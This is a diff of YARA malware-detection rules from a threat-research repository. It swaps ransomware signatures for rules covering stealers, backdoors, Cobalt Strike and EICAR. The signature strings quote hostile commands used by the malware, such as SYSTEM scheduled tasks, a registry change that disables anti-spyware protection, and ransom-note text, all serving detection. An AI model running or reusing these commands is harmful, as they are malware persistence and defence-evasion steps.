-		$1 = "boost::interprocess::spin_recursive_mutex recursive lock overflow" fullword ascii
-		$2 = ".?AU?$error_info_injector@Usync_queue_is_closed@concurrent@boost@@@exception_detail@boost@@" fullword ascii
-		$3 = ".?AV?$CipherModeFinalTemplate_CipherHolder@V?$BlockCipherFinal@$00VDec@RC6@CryptoPP@@@CryptoPP@@VCBC_Decryption@2@@CryptoPP@@" fullword ascii
-		$4 = "?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v" fullword ascii
-		$5 = "cipher.exe" fullword ascii
-		$6 = ".?AU?$placement_destroy@Utrace_queue@@@ipcdetail@interprocess@boost@@" fullword ascii
-		$7 = "3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%" fullword ascii
-		$8 = "CreateProcess failed" fullword ascii
-		$9 = "boost::dll::shared_library::load() failed" fullword ascii
-		$op1 = { 8b df 83 cb 0f 81 fb ff ff ff 7f 76 07 bb ff ff }
-		$op2 = { 8b df 83 cb 0f 81 fb ff ff ff 7f 76 07 bb ff ff }
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 6 of them ) and all of ( $op* ) ) or ( all of them )
-}
-rule TRELLIX_ARC_Ransom_Maze : RANSOMWARE FILE
-{
-	meta:
-		description = "Detecting MAZE Ransomware"
-		author = "McAfee ATR"
-		id = "098a93c4-9aab-5563-af17-7aa91b056f64"
-		date = "2020-04-19"
-		modified = "2020-10-12"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Maze.yar#L1-L39"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5badaf28bde6dcf77448b919e2290f95cd8d4e709ef2d699aae21f7bae68a76c"
-		logic_hash = "fc16475fbc2a2acf5d053ded4d2ec4126c6d6dcac3a6eafadcd6c61419dd7594"
-		score = 75
-		quality = 68
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Maze"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-
-	strings:
-		$x1 = "process call create \"cmd /c start %s\"" fullword wide
-		$s1 = "%spagefile.sys" fullword wide
-		$s2 = "%sswapfile.sys" fullword wide
-		$s3 = "%shiberfil.sys" fullword wide
-		$s4 = "\\wbem\\wmic.exe" fullword wide
-		$s5 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" fullword ascii
-		$s6 = "NO MUTEX | " fullword wide
-		$s7 = "--nomutex" fullword wide
-		$s8 = ".Logging enabled | Maze" fullword wide
-		$s9 = "DECRYPT-FILES.txt" fullword wide
-		$op0 = { 85 db 0f 85 07 ff ff ff 31 c0 44 44 44 44 5e 5f }
-		$op1 = { 66 90 89 df 39 ef 89 fb 0f 85 64 ff ff ff eb 5a }
-		$op2 = { 56 e8 34 ca ff ff 83 c4 08 55 e8 0b ca ff ff 83 }
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
-}
-rule TRELLIX_ARC_Snake_Ransomware : RANSOMWARE FILE
-{
-	meta:
-		description = "Rule to detect Snake ransomware"
-		author = "McAfee ATR Team"
-		id = "b8f50af5-5568-5676-93a1-e818f08df0ce"
-		date = "2020-02-20"
-		modified = "2020-10-12"
-		reference = "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_snake_ransomware.yar#L1-L26"
+		reference = "https://twitter.com/demonslay335/status/1038060120461266944"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_screenlocker_5h311_1nj3c706.yar#L1-L33"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60"
-		logic_hash = "3ae64fbacbf886b8d09abc3f5f8eb9c8bff809909a251f2d055056e6d12217a2"
+		hash = "016ee638bd4fccd5ca438c2e0abddc4b070f59269c08f11c5313ba9c37190718"
+		logic_hash = "61b4495841c77053ba2631f087197719f3ee45cd93add022f23b87ece8563619"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/EKANS"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-
-	strings:
-		$snake = { 43 3A 2F 55 73 ?? 72 ?? 2F 57 49 4E 31 2F 67 6F 2F 73 ?? 63 2F 6A 6F 62 6E 68 62 67 6E 6E 69 66 70 6F 64 68 68 70 ?? 6D 66 2F 6E 66 64 6C 68 6F 70 68 6B 65 69 6A 61 64 67 66 64 64 69 6D 2F 6E 66 64 6C 68 6F 70 68 6B 65 69 6A 61 64 67 66 64 64 69 6D 2F 76 74 5F 73 74 ?? 69 6E 67 2E 67 6F 00 }
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 11000KB ) and all of them
-}
-
-rule TRELLIX_ARC_Ragnarlocker_Ransomware : RANSOMWARE FILE
-{
-	meta:
-		description = "Rule to detect RagnarLocker samples"
-		author = "McAfee ATR Team"
-		id = "58874f27-3070-52c9-bd96-337fdaa4499b"
-		date = "2020-04-15"
-		modified = "2020-10-12"
-		reference = "https://www.bleepingcomputer.com/news/security/ragnar-locker-ransomware-targets-msp-enterprise-support-tools/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_ragnarlocker.yar#L3-L45"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "9706a97ffa43a0258571def8912dc2b8bf1ee207676052ad1b9c16ca9953fc2c"
-		logic_hash = "2f31da9182a1b47fb1e7e4459461de4c496ec323ff13e622d3ce27ac8cce1912"
-		score = 75
-		quality = 68
-		tags = "RANSOMWARE, FILE"
+		tags = "SCREENLOCKER, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/RagnarLocker"
+		malware_type = "screenlocker"
+		malware_family = "ScreenLocker:W32/5h311_1nj3c706"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = {2D 2D 2D 52 41 47 4E 41 52 20 53 45 43 52 45 54 2D 2D 2D}
-		$s2 = { 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? B8 ?? ?? ?? ?? 0F 44 }
-		$s3 = { 5? 8B ?? 5? 5? 8B ?? ?? 8B ?? 85 ?? 0F 84 }
-		$s4 = { FF 1? ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 85 }
-		$s5 = { 8D ?? ?? ?? ?? ?? 5? FF 7? ?? E8 ?? ?? ?? ?? 85 ?? 0F 85 }
-		$op1 = { 0f 11 85 70 ff ff ff 8b b5 74 ff ff ff 0f 10 41 }
-		$p0 = { 72 eb fe ff 55 8b ec 81 ec 00 01 00 00 53 56 57 }
-		$p1 = { 60 be 00 00 41 00 8d be 00 10 ff ff 57 eb 0b 90 }
-		$bp0 = { e8 b7 d2 ff ff ff b6 84 }
-		$bp1 = { c7 85 7c ff ff ff 24 d2 00 00 8b 8d 7c ff ff ff }
-		$bp2 = { 8d 85 7c ff ff ff 89 85 64 ff ff ff 8d 4d 84 89 }
+		$s1 = "C:\\Users\\Hoang Nam\\source\\repos\\WindowsApp22\\WindowsApp22\\obj\\Debug\\WindowsApp22.pdb" fullword ascii
+		$s2 = "cmd.exe /cREG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\ActiveDesktop /v NoChangingWallPaper /t REG_DWOR" wide
+		$s3 = "C:\\Users\\file1.txt" fullword wide
+		$s4 = "C:\\Users\\file2.txt" fullword wide
+		$s5 = "C:\\Users\\file.txt" fullword wide
+		$s6 = " /v Wallpaper /t REG_SZ /d %temp%\\IMG.jpg /f" fullword wide
+		$s7 = " /v DisableAntiSpyware /t REG_DWORD /d 1 /f" fullword wide
+		$s8 = "All your file has been locked. You must pay money to have a key." fullword wide
+		$s9 = "After we receive Bitcoin from you. We will send key to your email." fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 4 of ( $s* ) and $op1 ) or all of ( $p* ) and pe.imphash ( ) == "9f611945f0fe0109fe728f39aad47024" or all of ( $bp* ) and pe.imphash ( ) == "489a2424d7a14a26bfcfb006de3cd226"
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-
-rule TRELLIX_ARC_Badbunny : RANSOMWARE FILE
+rule TRELLIX_ARC_Masslogger_Stealer : STEALER FILE
 {
 	meta:
-		description = "Bad Rabbit Ransomware"
-		author = "Christiaan Beek"
-		id = "190ee396-4c26-54f7-baac-bb45e3587488"
-		date = "2017-10-24"
+		description = "Rule to detect unpacked MassLogger stealer"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "c3a40108-3f0c-5949-9201-95c3c38b352a"
+		date = "2020-07-02"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_BadRabbit.yar#L3-L47"
+		reference = "https://urlhaus.abuse.ch/browse/signature/MassLogger/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_masslogger_stealer.yar#L1-L63"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "2879b8dc1ca0e86253354ac24b56d950878b23215b503da9b1d5faabd2c4bf9d"
+		hash = "343873155b6950386f7d9bcd8d2b2e81088521aedf8ff1333d20229426d8145c"
+		logic_hash = "476b3f3a54a4616058a2aef01adbe429a38eacc8ee58881d31bd28e795a27575"
 		score = 75
-		quality = 45
-		tags = "RANSOMWARE, FILE"
+		quality = 66
+		tags = "STEALER, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/BadRabbit"
+		malware_type = "stealer"
+		malware_family = "Stealer:W32/MassLogger"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash1 = "8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93"
 
 	strings:
-		$x1 = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" fullword wide
-		$x2 = "need to do is submit the payment and get the decryption password." fullword ascii
-		$s3 = "If you have already got the password, please enter it below." fullword ascii
-		$s4 = "dispci.exe" fullword wide
-		$s5 = "\\\\.\\GLOBALROOT\\ArcName\\multi(0)disk(0)rdisk(0)partition(1)" fullword wide
-		$s6 = "Run DECRYPT app at your desktop after system boot" fullword ascii
-		$s7 = "Enter password#1: " fullword wide
-		$s8 = "Enter password#2: " fullword wide
-		$s9 = "C:\\Windows\\cscc.dat" fullword wide
-		$s10 = "schtasks /Delete /F /TN %ws" fullword wide
-		$s11 = "Password#1: " fullword ascii
-		$s12 = "\\AppData" fullword wide
-		$s13 = "Disk decryption completed" fullword wide
-		$s14 = "Files decryption completed" fullword wide
-		$s15 = "http://diskcryptor.net/" fullword wide
-		$s16 = "Your personal installation key#1:" fullword ascii
-		$s17 = ".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg." wide
-		$s18 = "Disable your anti-virus and anti-malware programs" fullword wide
-		$s19 = "bootable partition not mounted" fullword ascii
+		$pattern_0 = { 6437 3e2585829c88 ec ec 1bc8 }
+		$pattern_1 = { d7 b9513e1ba7 195ab6 e6df 7e2a 5a b6cc }
+		$pattern_2 = { 80aee281aae280 8ee2 808ce2808ee2808e e280 ae 00436f 6e }
+		$pattern_3 = { 6d e586 4c 40 }
+		$pattern_4 = { e281 ab e280 8ee2 80aee281aae280 8ee2 }
+		$pattern_5 = { 6c 69636b65644576 656e 7441 7267 7300 }
+		$pattern_6 = { 6e 7e81 d86aaf 61 93 7c2b 832b62 }
+		$pattern_7 = { 8b1c87 e7ed 24a2 3218 73df 53 }
+		$pattern_8 = { ee 9a357f9a475399 3188eef97d50 3f ef c9 }
+		$pattern_9 = { 44 a2???????? 92 7526 42 208fb5ca7050 }
+		$pattern_10 = { f2bbafb0d5f8 d524 0d48c906ba 7977 5d }
+		$pattern_11 = { 748f 46 4e 49 2af2 ee 9a357f9a475399 }
+		$pattern_12 = { 237ddb e200 95 46 99 37 }
+		$pattern_13 = { d9ae1d19ec3b 01db c5615c ec }
+		$pattern_14 = { 304a8a e2f4 bde7a84f79 c038d3 197ceae6 }
+		$pattern_15 = { 291f ff84c3bd55d8dc f331f2 1a3a 9c 7d78 }
+		$pattern_16 = { 3f 7af1 77a2 24ae 7ff3 }
+		$pattern_17 = { d1655d 7236 3873c1 b59e }
+		$pattern_18 = { 2aff 95 55 28ff 94 53 }
+		$pattern_19 = { e6b1 43 08d2 ef 43 3c38 }
+		$pattern_20 = { 6964427275736800 43 6f 6c 6f 7200 e281 }
+		$pattern_21 = { 37 005400a7 877f08 54 00e1 875303 5c }
+		$pattern_22 = { 6a45 e42c d3ba76c4f058 ce 3037 }
+		$pattern_23 = { b59e 59 f1 f1 }
+		$pattern_24 = { 7988 cd09 91 0099664e0391 008288490061 008c88d3099900 }
+		$pattern_25 = { 1e e3c2 00ff 698876be8fb365b13eb7 45 }
+		$pattern_26 = { 3d4c9deadf 57 ddeb 97 }
+		$pattern_27 = { e280 8ee2 808ee281aee280 8ee2 81ace281ace280ade280ab e281 }
+		$pattern_28 = { 4d 9c 8e5753 32414f d28a7173e2c4 7ee4 d9ae1d19ec3b }
+		$pattern_29 = { 7472 69704d656e755f 53 61 }
+		$pattern_30 = { 79bc fa ad 49 }
+		$pattern_31 = { 875303 5c 00140a 37 005c00a7 }
+		$pattern_32 = { 7265 5f 43 6c 69636b00746f6f 6c 53 }
+		$pattern_33 = { 36e633 2b2b 3673d1 d480 124d2d }
+		$pattern_34 = { 19b3e7ab29db 51 e1f3 dd3a 266f b884c4b53b }
+		$pattern_35 = { 7467 43 f332d2 84bf3df2e66b 4a ba5a20d9f5 3dbf2a3753 }
+		$pattern_36 = { f271f3 8877f7 a8e5 6437 3e2585829c88 }
+		$pattern_37 = { ce 84604c 3f 8cc6 56 bf165fdec5 4a }
+		$pattern_38 = { ad 49 a2???????? 4c e15b 8b1c87 }
+		$pattern_39 = { 3400 b687 bc083c00cd 87ce 083400 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and pe.imphash ( ) == "94f57453c539227031b918edd52fc7f1" and ( 1 of ( $x* ) or 4 of them ) ) or ( all of them )
+		7 of them and filesize < 3834880
 }
-rule TRELLIX_ARC_Badrabbit_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Malw_Likseput_Backdoor_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Bad Rabbit Ransomware"
+		description = "Rule to detect Likseput backdoor based on the PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "d6e78c14-0913-5eed-be15-a6d1a8cd1a8d"
-		date = "2025-06-01"
+		id = "2193daf8-016b-5f49-97ec-b821c8da22f6"
+		date = "2011-03-26"
 		modified = "2020-08-14"
-		reference = "https://securelist.com/bad-rabbit-ransomware/82851/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_BadRabbit.yar#L49-L101"
+		reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_likseput.e"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_likseput_backdoor_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "7536f021ce7fede0f1a2bf2f4ebc7d6e7269a6dd63005cab1fc6a309a71c61c0"
+		hash = "993b36370854587f4eef3366562f01ab87bc4f7b88a21f07b44bd5051340386d"
+		logic_hash = "2afc4b7e6a5f0d9fed9a075aebaac8157e843c83c55c3f2255431bb6a03459ec"
 		score = 75
-		quality = 43
-		tags = "RANSOMWARE, FILE"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/BadRabbit"
+		quality = 70
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Likseput"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\" -id %u && exit\"" fullword wide
-		$s2 = "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\" fullword wide
-		$s3 = "process call create \"C:\\Windows\\System32\\rundll32.exe" fullword wide
-		$s4 = "need to do is submit the payment and get the decryption password." fullword wide
-		$s5 = "schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" fullword wide
-		$s6 = "rundll32 %s,#2 %s" fullword ascii
-		$s7 = " \\\"C:\\Windows\\%s\\\" #1 " fullword wide
-		$s8 = "Readme.txt" fullword wide
-		$s9 = "wbem\\wmic.exe" fullword wide
-		$s10 = "SYSTEM\\CurrentControlSet\\services\\%ws" fullword wide
-		$og1 = { 39 74 24 34 74 0a 39 74 24 20 0f 84 9f }
-		$og2 = { 74 0c c7 46 18 98 dd 00 10 e9 34 f0 ff ff 8b 43 }
-		$og3 = { 8b 3d 34 d0 00 10 8d 44 24 28 50 6a 04 8d 44 24 }
-		$oh1 = { 39 5d fc 0f 84 03 01 00 00 89 45 c8 6a 34 8d 45 }
-		$oh2 = { e8 14 13 00 00 b8 ff ff ff 7f eb 5b 8b 4d 0c 85 }
-		$oh3 = { e8 7b ec ff ff 59 59 8b 75 08 8d 34 f5 48 b9 40 }
-		$oj4 = { e8 30 14 00 00 b8 ff ff ff 7f 48 83 c4 28 c3 48 }
-		$oj5 = { ff d0 48 89 45 e0 48 85 c0 0f 84 68 ff ff ff 4c }
-		$oj6 = { 85 db 75 09 48 8b 0e ff 15 34 8f 00 00 48 8b 6c }
-		$ok1 = { 74 0c c7 46 18 c8 4a 40 00 e9 34 f0 ff ff 8b 43 }
-		$ok2 = { 68 f8 6c 40 00 8d 95 e4 f9 ff ff 52 ff 15 34 40 }
-		$ok3 = { e9 ef 05 00 00 6a 10 58 3b f8 73 30 8b 45 f8 85 }
+		$pdb = "\\work\\code\\2008-7-8muma\\mywork\\winInet_winApplication2009-8-7\\mywork\\aaaaaaa\\Release\\aaaaaaa.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) and all of ( $og* ) ) or all of ( $oh* ) or all of ( $oj* ) or all of ( $ok* )
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and any of them
 }
-rule TRELLIX_ARC_Ransom_Xinof : RANSOMWARE FILE
+rule TRELLIX_ARC_MALW_Cobaltrike : BACKDOOR FILE
 {
 	meta:
-		description = "Detect Xinof ransomware"
-		author = "Thomas Roccia | McAfee ATR team"
-		id = "3b064ce4-cd5b-5a4a-bb55-a2c2c361791e"
-		date = "2020-11-20"
-		modified = "2020-11-20"
-		reference = "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_xinof.yar#L53-L82"
+		description = "Rule to detect CobaltStrike beacon"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "a7dae4c7-672e-58fb-8542-90fa90d991a4"
+		date = "2020-07-19"
+		modified = "2021-08-30"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_cobaltstrike.yar#L1-L38"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "0c1e6299a2392239dbe7fead33ef4146"
-		logic_hash = "42110ee8869d56c53dc201cbc83652c6457541b8d502aa12b37ef6200e735a15"
+		logic_hash = "fc91d40c6544c7ab7c60b3cb8fc542bd4a6fac79dbe00cad8f612854f2a6dcd1"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom/XINOF"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/CobaltStrike"
 		actor_type = "Cybercrime"
-		actor_group = "FONIX"
+		actor_group = "Unknown"
+		hash1 = "f47a627880bfa4a117fec8be74ab206690e5eb0e9050331292e032cd22883f5b"
 
 	strings:
-		$s1 = "XINOF.exe" nocase ascii
-		$s2 = "C:\\Users\\Phoenix" nocase ascii
-		$s3 = "How To Decrypt Files.hta" nocase ascii
-		$s4 = "C:\\ProgramData\\norunanyway" nocase ascii
-		$s5 = "C:\\ProgramData\\clast" nocase ascii
-		$s6 = "fonix1" nocase ascii
-		$s7 = "C:\\Windows\\System32\\shatdown.exe" nocase ascii
-		$s8 = "XINOF Ransomw" nocase ascii
-		$s9 = "XINOF v4.2" nocase ascii
-		$s10 = "XINOF Ransomware Version 3.3" nocase ascii
+		$pattern_0 = { e9???????? eb0a b801000000 e9???????? }
+		$pattern_1 = { 3bc7 750d ff15???????? 3d33270000 }
+		$pattern_2 = { 8bd0 e8???????? 85c0 7e0e }
+		$pattern_3 = { 50 8d8d24efffff 51 e8???????? }
+		$pattern_4 = { 03b5d4eeffff 89b5c8eeffff 3bf7 72bd 3bf7 }
+		$pattern_5 = { 8b450c 8945f4 8d45f4 50 }
+		$pattern_6 = { 33c5 8945fc 8b4508 53 56 ff750c 33db }
+		$pattern_7 = { e8???????? e9???????? 833d????????01 7505 e8???????? }
+		$pattern_8 = { 53 53 8d85f4faffff 50 }
+		$pattern_9 = { 68???????? 53 50 e8???????? 83c424 }
+		$pattern_10 = { 488b4c2420 8b0401 8b4c2408 33c8 8bc1 89442408 }
+		$pattern_11 = { 488d4d97 e8???????? 4c8d9c24d0000000 418bc7 498b5b20 498b7328 498b7b30 }
+		$pattern_12 = { bd08000000 85d2 7459 ffcf 4d85ed }
+		$pattern_13 = { 4183c9ff 33d2 ff15???????? 4c63c0 4983f8ff }
+		$pattern_14 = { 49c1e002 e8???????? 03f3 4d8d349e 3bf5 7d13 }
+		$pattern_15 = { 752c 4c8d45af 488d55af 488d4d27 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 5 of ( $s* ) or TRELLIX_ARC_Ransom_Xinof_Chunk_PRIVATE
+		7 of them and filesize < 696320
 }
-rule TRELLIX_ARC_Cryptonar_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Malw_Eicar : EICAR
 {
 	meta:
-		description = "Rule to detect CryptoNar Ransomware"
+		description = "Rule to detect the EICAR pattern"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "0911250f-fc1f-58bc-ac09-d77d2a2ed3ce"
+		id = "16307b03-7fab-5d68-ad3b-0efcea952fcf"
 		date = "2025-06-01"
 		modified = "2020-08-14"
-		reference = "https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_CryptoNar.yar#L1-L36"
+		reference = "https://www.eicar.org/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_Eicar.yar#L1-L22"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "04c1c4f45ad3552aa0876c3b645c6ca92493018f7fdc5d9d9ed26cf67199d21b"
+		hash = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
+		logic_hash = "564b0592f40582fe71e2dab0c0f25c168462f9297c13e7c9f06ac51b492e4533"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/CryptoNar"
-		actor_type = "Cybercrime"
+		tags = "EICAR"
+		malware_type = "eicar"
+		malware_family = "W32/Eicar"
+		actor_type = "Unknown"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "C:\\narnar\\CryptoNar\\CryptoNarDecryptor\\obj\\Debug\\CryptoNar.pdb" fullword ascii
-		$s2 = "CryptoNarDecryptor.exe" fullword wide
-		$s3 = "server will eliminate the key after 72 hours since its generation (since the moment your computer was infected). Once this has " fullword ascii
-		$s4 = "Do not delete this file, else the decryption process will be broken" fullword wide
-		$s5 = "key you received, and wait until the decryption process is done." fullword ascii
-		$s6 = "In order to receive your decryption key, you will have to pay $200 in bitcoins to this bitcoin address: [bitcoin address]" fullword ascii
-		$s7 = "Decryption process failed" fullword wide
-		$s8 = "CryptoNarDecryptor.KeyValidationWindow.resources" fullword ascii
-		$s9 = "Important note: Removing CryptoNar will not restore access to your encrypted files." fullword ascii
-		$s10 = "johnsmith987654@tutanota.com" fullword wide
-		$s11 = "Decryption process will start soon" fullword wide
-		$s12 = "CryptoNarDecryptor.DecryptionProgressBarForm.resources" fullword ascii
-		$s13 = "DecryptionProcessProgressBar" fullword wide
-		$s14 = "CryptoNarDecryptor.Properties.Resources.resources" fullword ascii
+		$s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB ) and all of them
+		any of them
 }
-rule TRELLIX_ARC_Bitpaymer_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Malw_Mangzamel_Trojan : TROJAN FILE
 {
 	meta:
-		description = "Rule to detect BitPaymer Ransomware"
+		description = "Rule to detect Mangzamel  trojan based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "20b91cf2-2a84-55d9-8230-90d7b20a461f"
-		date = "2019-11-08"
+		id = "ca77180f-6133-5edb-a36b-78bc6f18d80c"
+		date = "2014-06-25"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/spanish-mssp-targeted-by-bitpaymer-ransomware/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Bitpaymer.yar#L1-L72"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_mangzamel_trojan_pdb.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "527cdbdf51e6f3f5d58e805cf4a1bc09c9d24880c2323046acef6ee03c92d62f"
+		hash = "4324580ea162a636b7db1efb3a3ba38ce772b7168b4eb3a149df880a47bd72b7"
+		logic_hash = "bab103c671445e0ea916fae290689d30d45021bdca58a495ebd3d6ca9ca55051"
 		score = 75
-		quality = 66
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "TROJAN, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/BitPaymer"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/Mangzamel"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "IEncrypt.dll" fullword wide
-		$op0 = { e8 5f f3 ff ff ff b6 e0 }
-		$op1 = { e8 ad e3 ff ff 59 59 8b 75 08 8d 34 f5 38 eb 42 }
-		$op2 = { e9 45 ff ff ff 33 ff 8b 75 0c 6a 04 e8 c1 d1 ff }
-		$pdb = "S:\\Work\\_bin\\Release-Win32\\wp_encrypt.pdb" fullword ascii
-		$oj0 = { 39 74 24 34 75 53 8d 4c 24 18 e8 b8 d1 ff ff ba }
-		$oj1 = { 5f 8b c6 5e c2 08 00 56 8b f1 8d 4e 34 e8 91 af }
-		$oj2 = { 8b cb 8d bd 50 ff ff ff 8b c1 89 5f 04 99 83 c1 }
-		$t1 = ".C:\\aaa_TouchMeNot_.txt" fullword wide
-		$ok0 = { e8 b5 34 00 00 ff 74 24 18 8d 4c 24 54 e8 80 39 }
-		$ok1 = { 8b 5d 04 33 ff 8b 44 24 34 89 44 24 5c 85 db 7e }
-		$ok2 = { 55 55 ff 74 24 20 8d 4c 24 34 e8 31 bf 00 00 55 }
-		$random = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+" fullword ascii
